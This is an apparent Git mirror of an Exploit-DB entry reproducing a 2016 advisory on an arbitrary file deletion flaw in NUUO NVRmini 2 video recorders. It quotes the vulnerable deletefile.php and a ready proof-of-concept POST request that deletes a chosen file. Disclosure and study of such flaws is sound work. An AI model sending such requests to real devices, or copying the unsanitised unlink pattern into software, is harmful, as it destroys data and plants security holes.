bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/40214.txt
Offensive Security e161127711 DB: 2016-08-07 
8 new exploits

Kodi Web Server 16.1 - Denial of Service
NUUO NVRmini 2 3.0.8 - Remote Root Exploit
NUUO NVRmini 2 3.0.8 - (Add Admin) CSRF
NUUO NVRmini 2 3.0.8 - Local File Disclosure
NUUO NVRmini 2 3.0.8 - Multiple OS Command Injection
NUUO NVRmini 2 3.0.8 - ShellShock Remote Code Execution
NUUO NVRmini 2 3.0.8 - Arbitrary File Deletion
NUUO NVRmini 2 3.0.8 - (strong_user.php) Backdoor Remote Shell Access
2016-08-07 05:06:35 +00:00

67 lines
2 KiB
Text
Executable file
Raw Blame History

NUUO Arbitrary File Deletion Vulnerability
Vendor: NUUO Inc.
Product web page: http://www.nuuo.com
Affected version: <=3.0.8
Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
functionality. Setup is simple and easy, with automatic port forwarding
settings built in. NVRmini 2 supports POS integration, making this the perfect
solution for small retail chain stores. NVRmini 2 also comes full equipped as
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
and RAID functions for data protection. Choose NVR and know that your valuable video
data is safe, always.
Desc: Input passed to the 'filename' parameter in 'deletefile.php' is not properly
sanitised before being used to delete files. This can be exploited to delete files
with the permissions of the web server using their absolute path or via directory
traversal sequences passed within the affected POST/GET parameter.
==================================================================
/deletefile.php:
----------------
1: <?php
2: $filename=$_POST['filename'];
3: unlink($filename);
4: if (file_exists($filename))
5: echo "fail";
6: else echo "true";
7: ?>
==================================================================
Tested on: GNU/Linux 3.0.8 (armv7l)
GNU/Linux 2.6.31.8 (armv5tel)
lighttpd/1.4.28
PHP/5.5.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5353
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5353.php
14.01.2016
--
POST /deletefile.php HTTP/1.1
Host: 10.0.0.17
Content-Length: x
Origin: http://10.0.0.17
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Connection: close
filename=He_molested_murdered_and_mutilated_her.mp4
Reference in a new issue View git blame Copy permalink